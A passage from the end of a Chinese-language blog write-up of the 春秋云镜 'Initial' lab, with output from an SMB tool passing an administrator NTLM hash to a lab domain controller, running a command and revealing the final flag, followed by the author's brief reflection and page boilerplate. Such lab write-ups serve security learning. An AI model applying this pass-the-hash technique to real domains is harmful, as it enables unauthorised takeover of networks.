class="line">SMB         172.22.1.2      445    DC01             [*] Windows Server 2016 Datacenter 14393 x64 (name:DC01) (domain:xiaorang.lab) (signing:True) (SMBv1:True)</span><br><span class="line">SMB         172.22.1.2      445    DC01             [+] xiaorang.lab\administrator:10cf89a850fb1cdbe6bb432b859164c8 (Pwn3d!)</span><br><span class="line">SMB         172.22.1.2      445    DC01             [+] Executed <span class="built_in">command</span> </span><br><span class="line">SMB         172.22.1.2      445    DC01             ___   ___</span><br><span class="line">SMB         172.22.1.2      445    DC01             \\ / /       / /    // | |     //   ) ) //   ) )  // | |     /|    / / //   ) )</span><br><span class="line">SMB         172.22.1.2      445    DC01             \  /       / /    //__| |    //   / / //___/ /  //__| |    //|   / / //</span><br><span class="line">SMB         172.22.1.2      445    DC01             / /       / /    / ___  |   //   / / / ___ (   / ___  |   // |  / / //  ____</span><br><span class="line">SMB         172.22.1.2      445    DC01             / /\\     / /    //    | |  //   / / //   | |  //    | |  //  | / / //    / /                                                                         </span><br><span class="line">SMB         172.22.1.2      445    DC01             / /  \\ __/ /___ //     | | ((___/ / //    | | //     | | //   |/ / ((____/ /                                                                         </span><br><span class="line">SMB         <span class="number">172.22</span>.<span class="number">1.2</span>      <span class="number">445</span>    DC01             </span><br><span class="line">SMB         <span class="number">172.22</span>.<span class="number">1.2</span>      <span class="number">445</span>    DC01             </span><br><span class="line">SMB         <span class="number">172.22</span>.<span class="number">1.2</span>      <span class="number">445</span>    DC01             flag03: e8f88d0d43d6&#125;</span><br><span class="line">SMB         <span class="number">172.22</span>.<span class="number">1.2</span>      <span class="number">445</span>    DC01             </span><br><span class="line">SMB         <span class="number">172.22</span>.<span class="number">1.2</span>      <span class="number">445</span>    DC01             Unbelievable! ! You found the last flag, which means you have full control over the entire domain network. </span><br></pre></td></tr></table></figure></div>

<p>最终flag就出了<br>flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}</p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>这次只是春秋云镜最简单的靶机，提前看了许多wp，下好了工具，熟悉了每一个流程才开始打的，但是还是花了将近两个小时的时间，不过收获是真的很大，以前不怎么理解的原理终于懂了一些</p>
<p>总的来说，是个不错的开始，继续奋斗！</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/link/">Link</a></li>
        
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%86%99%E5%9C%A8%E6%9C%80%E5%89%8D%E9%9D%A2"><span class="toc-number">1.</span> <span class="toc-text">写在最前面</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%BC%80%E5%A7%8B%EF%BC%81"><span class="toc-number">2.</span> <span class="toc-text">开始！</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#flag1"><span class="toc-number">2.1.</span> <span class="toc-text">flag1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag2"><span class="toc-number">2.2.</span> <span class="toc-text">flag2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#flag3"><span class="toc-number">2.3.</span> <span class="toc-text">flag3</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">3.</span> <span class="toc-text">总结</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://chimedal.github.io/2024/09/22/Initial/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://chimedal.github.io/2024/09/22/Initial/&text=春秋云境-Initial"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://chimedal.github.io/2024/09/22/Initial/&title=春秋云境-Initial"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://chimedal.github.io/2024/09/22/Initial/&is_video=false&description=春秋云境-Initial"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=春秋云境-Initial&body=Check out this article: https://chimedal.github.io/2024/09/22/Initial/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://chimedal.github.io/2024/09/22/Initial/&title=春秋云境-Initial"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://chimedal.github.io/2024/09/22/Initial/&title=春秋云境-Initial"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://chimedal.github.io/2024/09/22/Initial/&title=春秋云境-Initial"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://chimedal.github.io/2024/09/22/Initial/&title=春秋云境-Initial"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://chimedal.github.io/2024/09/22/Initial/&name=春秋云境-Initial&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://chimedal.github.io/2024/09/22/Initial/&t=春秋云境-Initial"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2025
    Chimedal
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/link/">Link</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
      <ul>
        
          <!-- 不蒜子统计 -->
          <span id="busuanzi_container_site_pv">
              本站总访问量<span id="busuanzi_value_site_pv"></span>次
          </span>
          <span class="post-meta-divider">|</span>
          <span id="busuanzi_container_site_uv" style='display:none'>
                  本站访客数<span id="busuanzi_value_site_uv"></span>人
          </span>
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
